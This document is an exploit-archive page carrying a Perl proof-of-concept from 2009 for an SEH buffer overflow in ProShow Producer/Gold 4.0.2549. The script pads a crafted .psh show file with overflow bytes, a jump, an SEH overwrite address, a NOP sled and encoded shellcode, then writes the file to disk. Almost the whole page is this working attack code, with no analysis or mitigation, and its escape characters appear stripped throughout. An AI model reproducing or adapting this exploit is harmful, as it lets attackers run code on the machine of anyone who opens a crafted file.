ProShow Producer / Gold 4.0.2549 (.psh) Universal BOF Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ProShow Producer / Gold 4.0.2549 (.psh) Universal BOF Exploit (SEH)
# Published : 2009-08-25
# Author : hack4love
# Previous Title : Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
# Next Title : HyperVM File Permissions Local Vulnerability
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH
##########################################################################
##http://files.photodex.com/release/psgold_40_2549.exe
##http://files.photodex.com/release/pspro_40_2549.exe
###########################################################################
##THIS EXPLOIT WORK SO GOOD FOR THE TWO PROGRAM############################
###########################################################################
##FIRST WAS BY corelanc0d3r################################################
###########################################################################
my $header="Photodex(R) ProShow(TM) Show File Version=0n".
"proshowVersion=2549n".
"title=Untitled ProShow 1n".
"fileName=proshowsploit.pshn".
"description=''n".
"showAspect=1n".
"showSizeX=16n".
"showSizeY=9n".
"loop=1n".
"loopRestart=1n".
"displaySizeX=704n".
"displaySizeY=528n".
"videoSizeX=720n".
"videoSizeY=480n".
"videoFrameRate=29970n".
"videoBitRate=1120000n".
"videoMuxBitRate=1394400n".
"outputImageSizeX=1024n".
"outputImageSizeY=768n".
"outputQuality=80n".
"toolbarEnable=1n".
"allowQuit=1n".
"allowPlay=1n".
"allowTime=1n".
"allowRestart=1n".
"allowSave=1n".
"allowSaveAll=1n".
"allowPrint=1n".
"allowPrintAll=1n".
"allowCopy=1n".
"allowSaver=1n".
"allowCta=1n".
"ctaLabel=ProShow Infon".
"ctaURL=http://www.photodex.com/n".
"background=1n".
"bgOutlineColor=0n".
"bgSizeMode=1n".
"bgColorizeColor=8421504n".
"waterOpacity=128n".
"waterZoom=10000n".
"waterColorizeColor=8421504n".
"musicVolumeOffset=100n".
"defaultCellVolumeOffset=100n".
"defaultCellFadeIn=100n".
"defaultCellFadeOut=100n".
"defaultMusicVolumeOffset=50n".
"defaultMusicFadeIn=100n".
"defaultMusicFadeOut=100n".
"maxDispWidth=800n".
"maxDispHeight=600n".
"maxRender=1n".
"maxRenderWidth=800n".
"maxRenderHeight=600n".
"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFFn".
"makeFileLocalFolder=c:/n".
"cells=2n".
"cell[0].imageEnable=1n".
"cell[0].nrOfImages=1n".
"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
####################################################################################
my $bof="x41" x 6151;
my $nsh="xEBx06x90x90";
my $seh="xf9x4cx1ax10";####Universal ##if.dnt
my $nop="x90" x 20;
my $sec=
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc2".
"xf8x23x02x83xebxfcxe2xf4x3ex10x67x02xc2xf8xa8x47".
"xfex73x5fx07xbaxf9xccx89x8dxe0xa8x5dxe2xf9xc8x4b".
"x49xccxa8x03x2cxc9xe3x9bx6ex7cxe3x76xc5x39xe9x0f".
"xc3x3axc8xf6xf9xacx07x06xb7x1dxa8x5dxe6xf9xc8x64".
"x49xf4x68x89x9dxe4x22xe9x49xe4xa8x03x29x71x7fx26".
"xc6x3bx12xc2xa6x73x63x32x47x38x5bx0ex49xb8x2fx89".
"xb2xe4x8ex89xaaxf0xc8x0bx49x78x93x02xc2xf8xa8x6a".
"xfexa7x12xf4xa2xaexaaxfax41x38x58x52xaax08xa9x06".
"x9dx90xbbxfcx48xf6x74xfdx25x9bx42x6exa1xf8x23x02";
###############################################################################
my $header2 = "ncell[0].images[0].imageEnable=1n".
"cell[0].images[0].name=Abstract_02n".
"cell[0].images[0].replaceableTemplate=1n".
"cell[0].images[0].sizeMode=1n".
"cell[0].images[0].colorizeColor=8421504n".
"cell[0].images[0].colorizeStrength=10000n".
"cell[0].images[0].outlineColor=16777215n".
"cell[0].images[0].aspectX=4n".
"cell[0].images[0].aspectY=3n".
"cell[0].images[0].videoVolume=100n".
"cell[0].images[0].objectId=1n".
"cell[0].images[0].videoSpeed=100n".
"cell[0].images[0].nrOfKeyframes=2n".
"cell[0].images[0].keyframes[0].timeSegment=1n".
"cell[0].images[0].keyframes[0].attributeMask=-1n".
"cell[0].images[0].keyframes[0].zoomX=10000n".
"cell[0].images[0].keyframes[0].zoomY=10000n".
"cell[0].images[0].keyframes[0].panAccelType=1n".
"cell[0].images[0].keyframes[0].zoomXAccelType=1n".
"cell[0].images[0].keyframes[0].zoomYAccelType=1n".
"cell[0].images[0].keyframes[0].rotationAccelType=1n".
"cell[0].images[0].keyframes[0].motionSmoothness=-1n".
"cell[0].images[0].keyframes[0].lockAR=1n".
"cell[0].images[0].keyframes[0].transparency=0n".
"cell[0].images[0].keyframes[0].colorizeColor=8421504n".
"cell[0].images[0].keyframes[0].colorizeStrength=10000n".
"cell[0].images[0].keyframes[0].shadowOffsetX=70n".
"cell[0].images[0].keyframes[0].shadowOffsetY=70n".
"cell[0].images[0].keyframes[1].timestamp=10000n".
"cell[0].images[0].keyframes[1].timeSegment=3n".
"cell[0].images[0].keyframes[1].segmentTimestamp=10000n".
"cell[0].images[0].keyframes[1].attributeMask=-1n".
"cell[0].images[0].keyframes[1].zoomX=10000n".
"cell[0].images[0].keyframes[1].zoomY=10000n".
"cell[0].images[0].keyframes[1].panAccelType=1n".
"cell[0].images[0].keyframes[1].zoomXAccelType=1n".
"cell[0].images[0].keyframes[1].zoomYAccelType=1n".
"cell[0].images[0].keyframes[1].rotationAccelType=1n".
"cell[0].images[0].keyframes[1].motionSmoothness=-1n".
"cell[0].images[0].keyframes[1].lockAR=1n".
"cell[0].images[0].keyframes[1].transparency=0n".
"cell[0].images[0].keyframes[1].colorizeColor=8421504n".
"cell[0].images[0].keyframes[1].colorizeStrength=10000n".
"cell[0].images[0].keyframes[1].shadowOffsetX=70n".
"cell[0].images[0].keyframes[1].shadowOffsetY=70n".
"cell[0].background=1n".
"cell[0].bgDefault=1n".
"cell[0].bgSizeMode=1n".
"cell[0].bgColorizeColor=8421504n".
"cell[0].sound.useDefault=1n".
"cell[0].sound.volume=100n".
"cell[0].sound.fadeIn=100n".
"cell[0].sound.fadeOut=100n".
"cell[0].sound.async=1n".
"cell[0].sound.musicUseDefault=1n".
"cell[0].sound.musicVolume=50n".
"cell[0].sound.musicFadeIn=100n".
"cell[0].sound.musicFadeOut=100n".
"cell[0].musicVolumeOffset=50n".
"cell[0].time=3000n".
"cell[0].transId=2n".
"cell[0].transTime=3000n".
"cell[0].includeGlobalCaptions=1n".
"cell[1].imageEnable=1n".
"cell[1].nrOfImages=1n".
"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpgn".
"cell[1].images[0].imageEnable=1n".
"cell[1].images[0].name=Abstract_01n".
"cell[1].images[0].replaceableTemplate=1n".
"cell[1].images[0].sizeMode=1n".
"cell[1].images[0].colorizeColor=8421504n".
"cell[1].images[0].colorizeStrength=10000n".
"cell[1].images[0].outlineColor=16777215n".
"cell[1].images[0].aspectX=4n".
"cell[1].images[0].aspectY=3n".
"cell[1].images[0].videoVolume=100n".
"cell[1].images[0].objectId=2n".
"cell[1].images[0].videoSpeed=100n".
"cell[1].images[0].nrOfKeyframes=2n".
"cell[1].images[0].keyframes[0].timeSegment=1n".
"cell[1].images[0].keyframes[0].attributeMask=-1n".
"cell[1].images[0].keyframes[0].zoomX=10000n".
"cell[1].images[0].keyframes[0].zoomY=10000n".
"cell[1].images[0].keyframes[0].panAccelType=1n".
"cell[1].images[0].keyframes[0].zoomXAccelType=1n".
"cell[1].images[0].keyframes[0].zoomYAccelType=1n".
"cell[1].images[0].keyframes[0].rotationAccelType=1n".
"cell[1].images[0].keyframes[0].motionSmoothness=-1n".
"cell[1].images[0].keyframes[0].lockAR=1n".
"cell[1].images[0].keyframes[0].transparency=0n".
"cell[1].images[0].keyframes[0].colorizeColor=8421504n".
"cell[1].images[0].keyframes[0].colorizeStrength=10000n".
"cell[1].images[0].keyframes[0].shadowOffsetX=70n".
"cell[1].images[0].keyframes[0].shadowOffsetY=70n".
"cell[1].images[0].keyframes[1].timestamp=10000n".
"cell[1].images[0].keyframes[1].timeSegment=3n".
"cell[1].images[0].keyframes[1].segmentTimestamp=10000n".
"cell[1].images[0].keyframes[1].attributeMask=-1n".
"cell[1].images[0].keyframes[1].zoomX=10000n".
"cell[1].images[0].keyframes[1].zoomY=10000n".
"cell[1].images[0].keyframes[1].panAccelType=1n".
"cell[1].images[0].keyframes[1].zoomXAccelType=1n".
"cell[1].images[0].keyframes[1].zoomYAccelType=1n".
"cell[1].images[0].keyframes[1].rotationAccelType=1n".
"cell[1].images[0].keyframes[1].motionSmoothness=-1n".
"cell[1].images[0].keyframes[1].lockAR=1n".
"cell[1].images[0].keyframes[1].transparency=0n".
"cell[1].images[0].keyframes[1].colorizeColor=8421504n".
"cell[1].images[0].keyframes[1].colorizeStrength=10000n".
"cell[1].images[0].keyframes[1].shadowOffsetX=70n".
"cell[1].images[0].keyframes[1].shadowOffsetY=70n".
"cell[1].background=1n".
"cell[1].bgDefault=1n".
"cell[1].bgSizeMode=1n".
"cell[1].bgColorizeColor=8421504n".
"cell[1].sound.useDefault=1n".
"cell[1].sound.volume=100n".
"cell[1].sound.fadeIn=100n".
"cell[1].sound.fadeOut=100n".
"cell[1].sound.async=1n".
"cell[1].sound.musicUseDefault=1n".
"cell[1].sound.musicVolume=50n".
"cell[1].sound.musicFadeIn=100n".
"cell[1].sound.musicFadeOut=100n".
"cell[1].musicVolumeOffset=50n".
"cell[1].time=3000n".
"cell[1].transId=2n".
"cell[1].transTime=3000n".
"cell[1].includeGlobalCaptions=1n".
"modifierCount=0n";
print $header.$bof.$nsh.$seh.$nop.$sec.$header2;
################################################################################
###################################################################
open(myfile,'>> HACK4LOVE.psh');
print myfile $header.$bof.$nsh.$seh.$nop.$sec.$header2;
##################################################################

# www.Syue.com [2009-08-25]